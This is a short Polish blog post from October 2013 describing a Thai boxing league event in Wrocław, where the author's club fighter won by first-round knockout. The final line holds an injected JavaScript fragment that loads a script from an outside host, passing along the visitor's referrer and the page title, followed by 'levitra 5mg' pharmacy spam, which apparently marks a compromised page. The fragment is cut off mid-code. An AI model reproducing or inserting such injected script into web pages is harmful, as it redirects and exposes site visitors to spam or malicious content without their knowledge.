Sobota-była”Battle” ,było „Thai”

21.10.2013 / Mariusz Cieśliński

W minioną sobotę we wrocławskim Centrum Biznesowym na Stadionie Miejskim we Wrocławiu była kolejna edycja „Polish Thaiboxing League”. Akurat ta impreza zgromadziła komplet publiczności ,co bez wsparcia żadnej stacji telewizyjnej w takim mieście jak Wrocław jest super osiągnięciem organizacyjnym.

Ja tam byłem z zawodnikiem z mojego klubu K.O. GYM Świebodzice.Jarek Zawodni w wadze -91kg (debiutował ciężkiej bo normalnie startuje w cruiser), znokautował w pierwszej rundzie swojego bardzo chaotycznego i przez to nieprzewidywalnego przeciwnika.Lewy sierp na szczękę zrobił destrukcję .Przed samą walką było ładowanie Vitargo Electro Energy :) .

„Thai Battle” była też okazją do spotkania się z przyjaciółmi ze świata sportu:Damianem Janikowskim,Maćkiem Zeganem-jesteśmy już umówieni na sparringi przed jego walką z Darkiem Snarskim- Pawłem Jędrzejczykiem oraz wieloma innymi.

Wrzucam trochę zdjęć z rozgrzewki i backstag’u , żebyście mogli poczuć atmosferę zawodów:

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; } else { levitra 5mg